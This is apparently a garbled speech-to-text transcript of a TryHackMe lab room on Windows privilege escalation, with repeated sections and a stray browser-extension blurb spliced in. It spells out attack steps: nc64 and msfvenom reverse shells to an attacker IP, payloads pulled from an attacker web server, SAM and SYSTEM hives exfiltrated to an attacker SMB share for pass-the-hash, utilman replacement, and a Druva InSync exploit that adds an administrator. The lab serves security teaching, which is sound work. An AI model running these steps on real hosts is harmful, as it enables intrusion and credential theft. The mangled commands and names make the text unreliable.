During a penetration test, you will often have access to some Windows hosts with an unprivileged user. Unprivileged users will hold limited access, including their files and folders only, and have no means to perform administrative tasks on the host, preventing you from having complete control over your target. This room covers fundamental techniques that attackers can use to elevate privileges in a Windows environment, allowing you to use initial unprivileged foothold to escalate to an administrator account, where possible. If you want to brush up on your skills first, you can have a look through the Windows Fundamentals module or the Hacking Windows module. Answer the questions below. Click Continue Learning. Simply put, privilege escalation consists of using given access to a host with user A and leveraging it to gain access to user B by abusing a weakness in the target system. While we will usually want user B to have administrative rights, there might be situations where we'll need to escalate into other unprivileged accounts before actually getting administrative privileges. Gaining access to different accounts can be as simple as finding credentials in text files or spreadsheets left unsecured by some careless user. That won't always be the case. Depending on the situation, we might need to abuse some of the following weaknesses. 1. Misconfigurations on Windows services or scheduled tasks. 2. Excessive privileges assigned to our account. 3. Vulnerable software. 4. Missing Windows security patches. Before jumping into the actual techniques, let's look at the different account types on a Windows system. Windows users. Windows systems mainly have two kinds of users. Depending on their access levels, we can categorize a user in one of the following groups. Administrators. These users have the most privileges. They can change any system configuration parameter and access any file in the system. Standard users. These users can access the computer, but only perform limited tasks. Typically, these users cannot make permanent or essential changes to the system and are limited to their files. Any user with administrative privileges will be part of the administrators group. On the other hand, standard users are part of the users group. In addition to that, you will usually hear about some special in accounts used by the operating system in the context of privilege escalation. System local system. An account used by the operating system to perform internal tasks. It has full access to all files and resources available on the host, with even higher privileges than administrators. Local service. Default account used to run Windows services with minimum privileges. It will use anonymous connections over the network. Network service. Default account used to run Windows services with minimum privileges. It will use the computer credentials to authenticate through the network. These accounts are created and managed by Windows, and you won't be able to use them as other regular accounts. Still, in some situations, you may gain their privileges due to exploiting specific services. Users that can change system configurations are part of which group? The system account has more privileges than the administrator user. Nay. Your streak has increased. You're closer to your next badge of 30 days. Keep up, amazing work. The easiest way to gain access to another user is to gather credentials from a compromised machine. Such credentials could exist for many reasons, including a careless user leaving them around in plaintext files, or even stored by some software like browsers or email clients. This task will present some known places to look for passwords on a Windows system. Before going into the task, remember to click the Start Machine button. You will be using the same machine throughout tasks 3 to 5. If you are using the attack box, this is also a good moment to start it as you'll be needing it for the following tasks. In case you prefer connecting to the target machine via, you can use the following credentials. User, thmunpriv. Password, password321. Unattended Windows installations. When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations, as they don't require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations. 1. See unit10.cmm. 2. See Windows Panther unit10.cmm. 3. See Windows Panther unit10.cmm. 4. See Windows System 32 CySprep.inf. 5. See Windows System 32 CySA. As part of these files, you might encounter credentials. Credentials. Username administrator, username. Domain thmbot local domain. Password my password 123 password. Credentials. PowerShell history. Whenever a user runs a command using PowerShell, it gets stored into a file that keeps a memory of past commands. This is useful for repeating commands you have used before quickly. If a user runs a command that includes a password directly as part of the PowerShell command line, it can later be retrieved by using the following command from a cmd.exe prompt. Type PSA profile tap data roaming mic. Windows PowerShell, Redline console hist. txt. Note, the command above will only work from cmd.exe, as won't recognize PSA profile % as an environment variable. To read the file from PowerShell, you'd have to replace PSA profile % with env user profile. Saved Windows credentials. Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials. Key list. While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with the runas command and the savecred option, as seen below. Runas savecred user admin cmd.exe. IS configuration. Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on iOS is stored in a file called .config and can store passwords for databases or configured authentication mechanisms. Depending on the installed version, we can find web config in one of the following locations. Mund, root web config. See Windows Microsoft.NET Framework 64.440.3319 config-web.config. Here is a quick way to find database connection strings on the file. Type C Windows Microsoft.NET Framework 64.440.3311 in config-web.config finds the connection string. Retrieve credentials from software. CompTIA. CompTIA is an SSH client commonly found on Windows systems. Instead of having to specify a connection's parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While CompTIA won't allow users to store their SSH password, it will store proxy configurations that include clear text authentication credentials. To retrieve the stored proxy credentials, you can search under the following registry key for proxy password with the following command. Reg query 8 key, current user software Simon Tatham putty sessions f proxy s note. Simon Tatham is the creator of CompTIA, and his name is part of the path, not the username for which we are retrieving the password. The stored username should also be visible after running the command above. Just as putty stores credentials, any software that stores passwords including browsers, email clients, VNC software and others will have methods to recover any passwords the user has saved. A password for the Julia.Jones user has been left on the PowerShell history. What is the password? A web server is running on the remote host. Find any interesting password on web.config files associated. Privilege escalation is not always a challenge. Some misconfigurations can allow you to obtain higher privileged user access, and in some cases, even administrator access. It would help if you considered these to belong more to the realm of CTF events, rather than scenarios you will encounter during real penetration testing engagements. However, if none of the previously mentioned methods works, you can always go back to these. Scheduled tasks. Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify. Scheduled tasks can be listed from the command line, using the tasks command without any options. To retrieve detailed information about any of the services, you can use a command like the following one. Command prompt. Tasks query tn von task fo list v folder. Hostname THM PC1. Task name von task. Task to run see tasks.bat. Run as user task as R1. You will get lots of information about the task, but what matters for us is the task to run parameter, which indicates what gets executed by the scheduled task, and the run as user parameter, which shows the user that will be used to execute the task. If our current user can modify or overwrite the task to run executable, we can control what gets executed by the task as R1 user, resulting in a simple privilege escalation. To check the file permissions on the executable, we use icacles. Command prompt. icacles key task.bat. Tasks task.tnt authority system I. Built-in administrators I. Built-in users I. As can be seen in the result, the built-in users group has full access over the tasks binary. This means we can modify the bat file and insert any payload we like. For your convenience, NC64EXE can be found on C tools. Let's change the bat file to spawn a reverse shell. Command prompt. CT echo T tools in 64EXE ECME.exe attacker IP4444 C task.bat. We then start a listener on the attacker machine on the same port we indicated on our reverse shell. LEP4444. The next time the scheduled task runs, you should receive the reverse shell with task as O1 privileges. While you probably wouldn't be able to start the task in a real scenario and would have to wait for the scheduled task to trigger, we have provided your user with permissions to start the task manually to save you some time. We can run the task with the following command. Command prompt. Tasks run in von task. And you will receive the reverse shell with task as O1 privileges as expected. Kali X. User at attacker C and VP4444. Listening on 0.0.0444. Connection received on 10.17590.50649. Microsoft Windows version 10.17763.1821. 2018 Microsoft Corporation. Alright, reserved. To Windows System 32 WOMI. Privacy 10.1. Go to Task as R1 desktop to retrieve a flag. Don't forget to input the flag at the end of this task. Always install elevated. Windows installer files, also known as .msi files, are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account, even unprivileged ones. This could potentially allow us to generate a malicious MSI file that would run with admin privileges. Note, the always install elevated method won't run this room's machine, and it's included as information only. This method requires 2 registry values to be set. You can query these from the command line using the commands below. Command prompt. T-regquery HKEU software policies Microsoft Windows installer. T-regquery HKLM software policies Microsoft Windows installer. To be able to exploit this vulnerability, both should be set. Otherwise, exploitation will not be possible. If these are set, you can generate a malicious.msi file using misvenom, as seen below. Misvenom, P Windows x64 shell, reverse TCP, lost attacking machine alpilport, lolport, fmsi o malicious.msi. As this is a reverse shell, you should also run the Metasploit handler module configured accordingly. Once you have transferred the file you have created, you can run the installer with the command below and receive the reverse shell. Command prompt. TIC Windows temp malicious MSI. Windows Privilege Escalation is not always a challenge. Privilege escalation is not always a challenge. Some misconfigurations can allow you to obtain higher privileged user access, and in some cases, even administrator access. It would help if you considered these to belong more to the realm of CTF events, rather than scenarios you will encounter during real penetration testing engagements. However, if none of the previously mentioned methods works, you can always go back to these. Scheduled tasks. Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary, or it's using a binary you can modify. Scheduled tasks can be listed from the command line using the tasks command without any options. To retrieve detailed information about any of the services, you can use a command like the following one. Command prompt. tasks query tn von task fo list v folder. Hostname THM PC1. Task name von task. Task to run task.bat. Run as user task as R1. You will get lots of information about the task, but what matters for us is the task to run parameter, which indicates what gets executed by the scheduled task, and the run as user parameter, which shows the user that will be used to execute the task. If our current user can modify or overwrite the task to run executable, we can control what gets executed by the task as R1 user, resulting in a simple privilege escalation. To check the file permissions on the executable, we use icacles. Command prompt. Tit icacles key task.bat. Tasks task.bat nt authority system I. Built-in administrators IF. Built-in users IF. As can be seen in the result, the built-in users group has full access over the tasks binary. This means we can modify the .bat file and insert any payload we like. For your convenience, NC64EXC can be found on ctools. Windows Privilege Escalation. Windows services are managed by the Service Control Manager, SCM. The SCM is a process in charge of managing the state of services as needed, checking the current status of any given service, and generally providing a way to configure services. Each service on a Windows machine will have an associated executable, which will be run by the SCM whenever a service is started. It is important to note that service executables implement special functions to be
Read Aloud is a Chrome and Firefox extension that uses text-to-speech technology to convert web page text to audio. It works on a variety of websites, including news sites, blogs, fan fiction, publications, textbooks, school and course materials. Windows services are managed by the Service Control Manager, SCM. The SCM, a process in charge of managing the state of services as needed, checking the current status of any given service, and generally providing a way to configure services. Each service on a Windows machine will have an associated executable, which will be run by the SCM whenever a service is started. It is important to note that service executables implement special functions to be able to communicate with the SCM, and therefore not any executable can be started as a service successfully. Each service also specifies the user account under which the service will run. To better understand the structure of a service, let's check the FOSTCC service configuration with the SCQC command. Command prompt. TCCC FOSTCC. SC query service config success. Service name, FOSTCC. Type 20Win32 share process. Start type 2 auto start. Arrow control, 1 normal. Binary path name, see Windows System 32 servers.coast.exe afost. Load, group. Tag, 0, display name, application host helper service. Dependencies. Service start name, local system. Here we can see that the associated executable is specified through the binary path name parameter, and the account used to run the service is shown on the service start name parameter. Services have a discretionary access control list, DACL, which indicates who has permission to start, stop, pause query status, query configuration, or reconfigure the service, amongst other privileges. The DACL can be seen from Process Hacker, available on your machine's desktop. All of the services configurations are stored on the registry under HKM System Current Control Set Services. A subkey exists for every service in the system. Again, we can see the associated executable on the image path value, and the account used to start the service on the object name value. If it has been configured for the service, it will be stored in a subkey called security. As you have guessed by now, only administrators can modify such registry entries by default. Insecure permissions on service executable. If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially. To understand how this works, let's look at a vulnerability found on Splinterware System Scheduler. To start, we will query the service configuration using SC. Command prompt. Task CySA Windows Scheduler. SC query service config success. Service name, Windows Scheduler. Type 10Win3201 process. Start type 2 auto start. We can see that the service installed by the vulnerable software runs as SCUSER1, and the executable associated with the service is in cprogra2 system or oneservice.exe. We then proceed to check the permissions on the executable. Command prompt. Use system unprivileged cprograte system 1 successfully processed 1 files, failed processing 0 files. And here we have something interesting. The everyone group has modify permissions, M, on the service's executable. This means we can simply overwrite it with any payload of our preference, and the service will execute it with the privileges of configured user account. Let's generate an X service payload using ISC² and serve it through a Python web server. Kali, Linux. User at attacker psi misconfigured p Windows x64 shell reverse TCP lostat attacker IPPL port 4445 FX service o rev svc.ex. User at attacker psi Python 3 HTTP port server. Serving HTTP on 0.0.0 port 8000 HTTP URL. We can then pull the payload from PowerShell with the following command. PowerShell get HTTP URL o rev svc.ex. Once the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the everyone group as well. Command prompt. cd cprograte2 system1. Cprograte system1 move wservice.text.wservice.exe.dkp. 1 files moved. Cprograte2 system1 moves user system unpriv svc.exe wservice.ex. 1 files moved. Cprograte2 system1 icacles.wservice.exe grant everyone F. Successfully processed 1 files. We start a reverse listener on our attacker machine. Kali, Linux. User at attacker psi, DAMVP 4445. And finally, restart the service. While in a normal scenario, you would likely have to wait for a service restart, you have been assigned privileges to restart the service yourself to save you some time. Use the following commands from a cmd.exe command prompt. Command prompt. TSC stop Windows Scheduler. TSC start Windows Scheduler. Note, PowerShell has ESC as an alias to set content. Therefore, you use SecurityX in order to control services with PowerShell this way. As a result, you'll get a reverse shell with CUSA1 privileges. Kali, Linux. User at attacker psi, DLVP 4445. Listening on 0.0.04445. Connection received on 10.17905069. Microsoft Windows version 10.17631821. Go to CUSA1 desktop to retrieve a flag. Don't forget to input the flag at the end of this task. Unquoted service paths. When we can't directly write into service executables as before, there might still be a chance to force a service into running arbitrary executables by using a rather obscure feature. When working with Windows services, a very particular behavior occurs when the service is configured to point to an unquoted executable. By unquoted, we mean that the path of the associated executable isn't properly quoted to account for spaces on the command. As an example, let's look at the difference between two services. These services are used as examples only and might not be available in your machine. The first service will use a proper quotation so that the SCM knows without a doubt that it has to execute the binary file pointed by C program files reamcznc server.exe, followed by the given parameters. Remember, PowerShell has scut as an alias to set content. Therefore, you need to use SecurityX to control services if you are in a PowerShell prompt. Now let's look at another service without proper quotation. Command prompt. THM disk sorter enterprise. AC query service config 6s. Service name, disk sorter enterprise. Type, 10Win3201 process. Start type E, to auto start. Error control, 0 ignore. Binary path name, C my programs disk sorter enterprise bin disks.exes. Load, order group. Tag, 0, display name. When the SCM tries to execute the associated binary, a problem arises. Since there are spaces on the name of the disk sorter enterprise folder, the command becomes ambiguous, and the SCM doesn't know which of the following you are trying to execute. Command argument 2, C myprograms disk.exe sort enterprise bin disks.exe. C myprograms disk sorter.exe enterprise bin disks.exe. C myprograms disk sorter enterprise bin disks.exe. This has to do with how the command prompt passes a command. Usually, when you send a command, spaces are used as argument separators, unless they are part of a quoted string. This means the right interpretation of the unquoted command would be to execute C myprograms disk.exe and take the rest as arguments. Instead of failing as it probably should, SCM tries to help the user and starts searching for each of the binaries in the order shown in the table. 1. First, search for C myprograms.exe. If it exists, the service will run this executable. 2. If the latter doesn't exist, it will then search for C myprograms. Insecure permissions on service executable. If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially. To understand how this works, let's look at a vulnerability found on Splinterware System Scheduler. To start, we will query the service configuration using SCI. Command prompt. CCC Windows Scheduler. AC query service config 6s. Service name, Windows Scheduler. Type, 10Win3201 process. Start type E, to auto start. Error control, 0 ignore. Binary path name, C prog2 system1 service.exe. Load, group. Tag, E. Display name, System Scheduler Service. Dependencies. Service start name, .scuser1. We can see that the service installed by the vulnerable software runs as scuser1, and the executable associated with the service in C prog2 system1 service.exe. We then proceed to check the permissions on the executable. Command prompt. User system unprivileged C prog2 system1 service.exe. Prog2 system1. And here we have something interesting. The everyone group has modify permissions on the service's executable. This means we can simply overwrite it with any payload of our preference, and the service will execute it with the privileges of the configured user account. Let's generate an X service payload using isvenom and serve it through a Python web server. Kali, Linux. User attacker PIPC mimc phenom P Windows x64 shell reverse TCPL host attacker IPL port 44445 FX service O rev svc.ex. User at attacker PC Python 3 MATTP port server. Serving HTTP on 0.0.0 port 8000 HTTP URL. We can then pull the payload from PowerShell with the following command. PowerShell get TTP URL O rev sc.ex. Once the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the everyone group as well. Command prompt. ctc prograde system 1. Prograde to system 1 and move wservice.exe service. We start a reverse listener on our attacker machine. Kali, Linux. And finally, restart the service. While in a normal scenario, you would likely have to wait for a service restart. You have been assigned privileges to restart the service yourself to save you some time. Use the following commands from a cmd.exe command prompt. Command prompt. TSC stop window scheduler. TST start window scheduler. Note: PowerShell is ASCII as an alias to set content. Therefore, you need to use ski.exe in order to control services with PowerShell this way. As a result, you'll get a reverse shell with CASA 1 privileges. Kali, X. User at attacker PC, NISES, P4445. List. unquoted. When we can't directly write into service executables as before, there might still be a chance to force a service into running arbitrary executables by using a rather obscure feature. When working with Windows services, a very particular behavior occurs when the service is configured to point to an unquoted executable. By unquoted, we mean that the path of the associated executable isn't properly quoted to account for spaces on the command. As an example, look at the difference between two services. These services are used as examples only and might not be available in your machine. The first service will use a proper quotation so that the SCM knows without a doubt that it execute the binary file pointed by C program files revians dnc serving server.exe, followed by the given parameters. Windows Privilege Escalation. Room. Learn the Windows Privilege Escalation. Remember, PowerShell has as an alias to set content, therefore you need to use ISC².exe to control services if you are in a PowerShell prompt. Now let's look at another service without proper quotation. When the SCM tries to execute the associated binary, a problem arises. Since there are spaces on the name of the disk sorter enterprise folder, the command becomes ambiguous, and the SCM doesn't know which of the following you are trying to execute. This has to do with how the command prompt parses a command. Usually, when you send a command, spaces are used as argument separators, unless they are part of a quoted string. This means the right interpretation of the unquoted command would be to execute cmyprogramsdisk.exe and take the rest as arguments. Instead of failing as it probably should, SCM tries to help the user and start searching for each of the binaries in the order shown in the table. First, search for cmyprogramsdisk.exe. If it exists, the service will run this executable. If the latter doesn't exist, it will then search for cmyprogramsdisksorter.exe. If it exists, the service will run this executable. If the latter doesn't exist, it will then search for cmyprogramsdisksorter.enterprise.bin.disks.exe. This option is expected to succeed and will typically be run in a default installation. From this behavior, the problem becomes evident. If an attacker creates any of the executables that are searched for before the expected service executable, they can force the service to run an arbitrary executable. While this sounds trivial, most of the service executables will be installed under C program files or C program files x86 by default, which isn't writable by unprivileged users. This prevents any vulnerable service from being exploited. There are exceptions to this rule. Some installers change the permissions on the installed folders, making the services vulnerable. An administrator might decide to install the service binaries in a non-default path. If such a path is world writable, the vulnerability can be exploited. In our case, the administrator installed the disk sorter binaries under key myprograms. By default, this inherits the permissions of the C directory, which allows any user to create files and folders in it. We can check this using icicles. The built-in users group has AD and WD privileges, allowing the user to create subdirectories and files, respectively. The process of creating an X service payload with misconfigured and transferring it to the target host is the same as before, so feel free to create the following payload and upload it to the server as before. We will also start a listener to receive the reverse shell when it gets executed. Insecure service permissions. You might still have a slight chance of taking advantage of a service if the service's executable DACL is well configured and the service's binary path is rightly quoted. Should the service DACL, not the service's executable DACL, allow you to modify the configuration of a service, you will be able to reconfigure the service. This will allow you to point to any executable you need and run it with any account you prefer, including system itself. To check for a service DACL from the command line, you can use access opens in new tab from the SysInternal internal suite. For your convenience, a copy is available at ctools. The command to check for the thumb service is Privileges are rights that an account has to perform specific system-related tasks. These tasks can be as simple as the privilege to shut down the machine up to privileges to bypass some based access controls. Each user has a set of assigned privileges that can be checked with the following command. Whoomi priv. A complete list of available privileges on Windows systems is available here. Opens in new tab. From an attacker's standpoint, only those privileges that allow us to escalate in the system are of interest. You can find a comprehensive list of exploitable privileges on the priv2 admin. Opens in new tab. GitHub project. While we won't take a look at each of them, we will showcase how to abuse some of the most common privileges you can find. CBackup CRestore. The CBackup and CRestore privileges allow users to and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges. Having this power, an attacker can trivially escalate privileges on the system by using many techniques. The one we will look at consists of copying the SAM and system registry hives to extract the local administrator's password hash. Log in to the target machine via RDP using the following credentials. User THM backup. Password, copymaster555. This account is part of the backup operators group, which by default is Granted the CISA backup and CRestore privileges, we will need to open a command prompt using the Open as Administrator option to use these privileges. We will be asked to input our password again to get an elevated console. Once on the command prompt, we can check our privileges with the following command. Command prompt. THM privileges information. Oh. Privilege name description state. New. To back up the SAM and system hashes, we can use the following commands. Command prompt. Reg save clum system C users THM backup system .hive. The operation completed successfully. Reg save clum system C users THM backup system .hive. The operation. This will create a couple of files with the registry hive's content. We can now copy these files to our attacker machine using SMB or any other available method. For SMB, we can use impact's smserver.py to start a simple server with a network share in the current directory of our attack box. Kali, Linux. User attackupc, minpedia share. User at attackupc Python 3.9 opt impact examples, zip.py. SMB2 support, username THM backup, password copymaster 555 public share. This will create a share named public pointing to the share directory, which requires the username and password of our current Windows session. After this, we can use the copy command in our Windows machine to transfer both files to our attack box. Command prompt. TTC users THM backup sam.hive attacker public. Say copy C users THM backup system.hive attacker public. And use impacket to retrieve the user's password hashes. Kali, Linux. Users at attackupc Python 3.9 opt impact examples secrets.py sam.hive system.hive local. Impacket v1.24 dev1 201704 1620462955792. Copyright 221 Secure Auth Corporation. Target system boot key 0x8660 ATCT BCC takes 821. Dumping local SAM hashes used rid. We can finally use the administrator's hash to perform a pass the hash attack and gain access to the target machine with system privileges. Kali. User at attackupc Python 3.9. The say take ownership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges. For example, search for a service running as system and take ownership of the service's executable. For this task, we will be taking a different route, however. Log in to the target machine via RDP using the following credentials. User THM take ownership. Password, the world is mine 2022. To get the say take ownership privilege, we need to open a command prompt using the open as administrator option. We will be asked to input our password to get an elevated console. Once on the command prompt, we can check our privileges with the following command. Command prompt. priv. Privileges information. We'll abuse utilman.exe to escalate privileges this time. Utilman is a built-in Windows application used to provide ease of access options during the lock screen. Since utilman is run with system privileges, we will effectively gain system privileges if we replace the original binary for any payload we like, as we can take ownership of any file. Replacing it is trivial. To replace utilman, we will start by taking ownership of it with the following command. Command prompt. Say to take own FC Windows System 32utilman.exe. Success, the file or folder. See Windows System 32utilman.exe, now owned by user, WinPrivacy2them take ownership. Notice that being the owner of a file doesn't necessarily mean that you have privileges over it, but being the owner you can assign yourself any privileges you need. To give your user full permissions over utilman.exe, you can use the following command. After this, we will replace utilman.exe with a copy of cmd.exe. To trigger utilman, we will lock our screen from the Start button. And finally, proceed to click on the Ease of Access button, which runs utilman.exe with system privileges. Since we replaced it with a cmd.exe copy, we will get a command prompt with system privileges. Same personate assign primary token. These privileges allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user. Impersonation is easily understood when you think about how an FTP server works. The FTP server must restrict users to only access the files they should be allowed to see. Let's assume we have an FTP service running with user FTP. Without impersonation, if user Ann logs to the server and tries to access her files, the service would try to access them with its access token rather than Ann's. There are several reasons why using token is not the best idea. For the files to be served correctly, they would need to be accessible to the FTP user. In the example above, the service would be able to access Ann's files, but not Bill's files, as the DACL in Bill's files doesn't allow user FTP. This adds complexity as we must manually configure specific permissions for each served file directory. For the operating system, all files are accessed by user FTP, independent of which user is currently logged in to the service. This makes it impossible to delegate the authorization to the operating system. Therefore, the service must implement it. If the service were compromised at some point, the attacker would immediately gain access to all of the folders to which the FTP user has access. If, on the other hand, the service's user has the same personate or assign primary privilege, all of this is simplified a bit, as the service can temporarily grab the access token of the user logging in and use it to perform any task on their behalf. Now, if user Ann logs in to the service, and given that the user has impersonation privileges, it can borrow Ann's access token and use it to access her files. This way, the files don't need to provide access to user FTP in any way, and the operating system handles authorization. Since the service is impersonating Ann, it won't be able to access Jude's or Bill's files during that session. As attackers, if we manage to take control of a process with impersonate or assign primary token privileges, we can impersonate any user connecting and authenticating to that process. In Windows systems, you will find that the local service and network service accounts already have such privileges. Since these accounts are used to spawn services using restricted accounts, it makes sense to allow them to impersonate connecting users if the service needs. Internet Information Services, ATS, will also create a similar default account called ISC² default pool for web applications. To elevate privileges using such accounts, an attacker needs the following. 1. To spawn a process so that users can connect and authenticate to it for impersonation to occur. 2. Find a way to force privileged users to connect and authenticate to the spawned malicious process. We will use rogue WinRM exploit to accomplish both conditions. Let's start by assuming we have already compromised a website running on IIS and that we have planted a web shell on the following address. HTTP URL. We can use the web shell to check for the assigned privileges of the compromised account and confirm we hold both privileges of interest for this task. To use rogue WinRM, we first need to upload the exploit to the target machine. For your convenience, this has already been done, and you can find the exploit in the C tools folder. The rogue WinRM exploit is possible because whenever a user, including unprivileged users, starts the bit service in Windows, it automatically creates a connection to port 59A5 using system privileges. Port 59A5 is typically used for the WinRM service, which is simply a port that exposes a PowerShell console to be used remotely through the network. Think of it like SSH, but using PowerShell. If for some reason, the WinRM service isn't running on the victim server, an attacker can start a fake WinRM service on port 5985 and catch the authentication attempt made by the bits service when starting. If the attacker has impersonate privileges, he can execute any command on behalf of the connecting user, which is CISM. Before running the exploit, we'll start a netcat listener to receive a reverse shell on our attacker's machine. Kali, Linux. User at attack_c, nenc lef4442. And then, use our web shell to trigger the rogue WinRM exploit using the following command. Tools rogue WinRM but xxap tools and 64exe at eecmd.exe at attacker i4442. Note, the exploit may take up to 2 minutes to work, so your browser may appear as unresponsive for a bit. This happens if you run the exploit multiple times, as it must wait for the bit service to stop before starting it again. The bit service will stop automatically after 2 minutes of starting. The P parameter specifies the executable to be run by the exploit, which is NC64exe in this case. The A parameter is used to pass arguments to the executable. Since we want NC64 to establish a reverse shell against our attacker machine, the arguments to pass to net will be ecmd.exe attacker i4442. If all was correctly set up, you should expect a shell with system privileges. Kali, X. User at attack_c, LDP44442. Listening, 0.0.04442. Connection received on 10.175. Windows Privilege Escalation. Room. Learn the fundamentals of Windows Privilege Escalation. Make sure click the Start Machine button before you continue, which will deploy the target machine in split view. If you prefer connecting to the machine via, you can use the following credentials. Username, unpriv. Password 321. Unpatched software. Software installed on the target system can present various privilege escalation opportunities. As with drivers, organizations and users may not update them as often as they update the operating system. You can use the make tool to list software installed on the target system and its versions. The command below will dump information it can gather on installed software. It might take around a minute to finish. Mic product get name version vendor. Remember that the mic product command may not return all installed programs. Depending on how some of the programs were installed, they might not get listed here. It is always worth checking desktop shortcuts, available services, or generally any trace that indicates the existence of additional software that might be vulnerable. Once we have gathered product version information, we can always search for existing exploits on the installed software online. Sites like ExploitDB. Opens in new tab. Packet Storm. Opens in a new tab. Or plain old Google. Opens in new tab. Amongst others. Using mic and Google, can you find a known Windows. Make sure to click the Start Machine button before you continue, which will deploy the target machine in split view. If you prefer connecting to the machine via, you can use the following credentials. Username, unpriv. Password 321. Unpatched software. Software installed on the target system can present various privilege escalation opportunities. As with drivers, organizations and users may not update them as often as they update the operating system. You can use the mic tool to list software installed on the target system and its versions. The command below will dump information it can gather on installed software. It might take around a minute to finish. Mic product get name version vendor. Remember that the mic product command may not return all installed programs. Depending on how some of the programs were installed, they might not get listed here. It is always worth checking desktop shortcuts, available services, or generally any trace that indicates the existence of additional software that might be vulnerable. Once we have gathered product version information, we can always search for existing exploits on the installed software online, like ExploitDB. Opens in new tab. Packet Storm. Opens in new tab. Or old Google. Opens in new tab. Amongst many others. Using mic and Google, can you find a known vulnerability on any installed product? Case study, Druva InSync 6.6.3. The target server is running Druva InSync 6.6.3, which is vulnerable to privilege escalation, as reported by Matteo Malvica. Opens in new tab. The vulnerability results from a bad patch applied over another vulnerability reported initially for version 6.0 by Chris Line. Opens in a new tab. The software is vulnerable because it runs an RPC, remote procedure call, server on port 6064 with system privileges, accessible from localhost only. If you aren't familiar with RPC, it is simply a mechanism that allows a given process to expose functions, called procedures in RPC lingo, over the network so that other machines can call them remotely. In the case of Druva InSync, one of the procedures exposed, specifically procedure number 5, on port 6064 allowed anyone to request the execution of any command. Since the RPC server runs as system, any command gets executed with system privileges. The original vulnerability reported on versions 6.5.0 and prior allowed any command to be run without restrictions. The original idea behind providing such functionality was to remotely execute some specific binaries provided with InSync, rather than any command. Still, no check was made to make sure of that. A patch was issued where they decided to check that the executed command started with the string C program data Druva InSync 4, where the allowed binaries were supposed to be. But then, this proved insufficient, since you could simply make a path traversal attack to bypass this kind of control. Suppose that you want to execute C Windows System 32 standard.exe, which is not in the allowed path. You could simply ask the server to run C program data Druva InSync 4, Windows System 32 standard.exe, and that would bypass the check successfully. To put together a working exploit, we need to understand how to talk to port 6064. Luckily for us, the protocol in use is straightforward, and the packets to be sent are depicted in the following diagram. The first packet is simply a hello packet that contains a fixed string. The second packet indicates that we want to execute procedure number 5, as this is the vulnerable procedure that will execute any command for us. The last two packets are used to send the length of the command and the command string to be executed, respectively. Initially published by Matteo Malvica here. Opens in a new tab. The following exploit can be used in your target machine to elevate privileges and retrieve this task's flag. For your convenience, here is the original exploit's code. Error action preference, stop. Commit into net user behind add. Says new object system.net.sockets.socket. System.net.sockets address family, internetwork. System.net.sockets socket type, stream. System.net.sockets protocol type, TP. Select connect, 127.0.1, 6064. Header as system text encoding, UT8 get bytes, sync THC RPC 00 Public type system text encoding, UT8 get bytes, TAR 0000000. Command system.text encoding, Unicode get bytes, program data Druva InSync 4, Windows System 32 tinted.exe centimeters. Length system bit converter, jet bytes command, length. So send header. So send type. So send and length. Send command. You can pop a console and pay exploit to execute it. Is also available in the tine at ctools Druva InSync it.txt. Note that the exploit's default payload, specified in the synonym variable, will create a user named Pund in the system, but won't assign him administrative privileges, so we will probably want to change the payload for something more useful. For this room, we will change the payload to run the following command. Net user point simple pass 123, add in net local group administrators pund add. Windows Privilege Escalation. Premium Room. Learn the fundamentals of Windows Privilege Escalation techniques. Medium. Several scripts exist to conduct system enumeration in ways similar to the ones seen in the previous task. These tools can shorten the enumeration process time and uncover different potential privilege escalation vectors. However, please remember that automated tools can sometimes miss privilege escalation. Below are a few tools commonly used to identify privilege escalation vectors. Feel free to run them against any of the machines in this room and see if the results match the discussed attack vectors. WinPs. WinPs is a script developed to enumerate the target system to uncover privilege escalation paths. You can find more information about WinPs and download either the precompiled executable or a BAT script. WinPs will run commands similar to the ones listed in the previous task and print their output. The output from WinPs can be lengthy and sometimes difficult to read. This is why it would be good practice to always redirect the output to a file, as shown below. Command prompt. C to WinPs.exe output file txt. WinPs can be downloaded here. Opens in new tab. Privacy check. Privacy check is a PowerShell script that searches common privilege escalation on the target system. It provides an alternative to WinPs without requiring the execution of a binary file. Privacy check can be downloaded here. Opens in new tab. Reminder, to run privacy check on the target system, you may need to bypass the execution policy restrictions. To achieve this, you can use the set execution policy command, as shown below. CSC, set execution policy bypass, scope process force. TSC, privacy check.ps1. TSC, invoke privacy check. WES-NG, Windows exploit suggester, next generation. Some exploit suggesting scripts, e.g. WinPs, will require you to upload them to the target system and run them there. This may cause antivirus software to detect and delete them. To avoid making unnecessary noise that can attract attention, you may prefer to use NG, which will run on your attacking machine, e.g. Kali or TryHackMe attack box. WES-NG is a Python script that can be found and downloaded here. Opens in new tab. Once installed and before using it, type the wes.p update command to update the database. The script will refer to the database it creates to check for missing patches that can result in a vulnerability you can use to elevate your privileges on the target system. To use the script, you will need to run the systeminfo command on the target system. Do not forget to direct the output to a.txt file you will need to move to your attacking machine. Once this is done, wespy can be run as follows. Kali, Linux. User at Kali wespy systeminfo.txt. Metasploit. If you already have a Metapreter shell on the target system, you can use the multi-recon local exploit suggester module to list vulnerabilities that may affect the target system and allow you to elevate your privileges on the target system. In this room, we have introduced several privilege escalation techniques available in Windows systems. These techniques should provide you with a solid background on the most common paths attackers can take to elevate privileges on a system. Should you be interested in learning about additional techniques, the following resources are available. Payloads Healthy Things, Windows Privilege Escalation, opens in 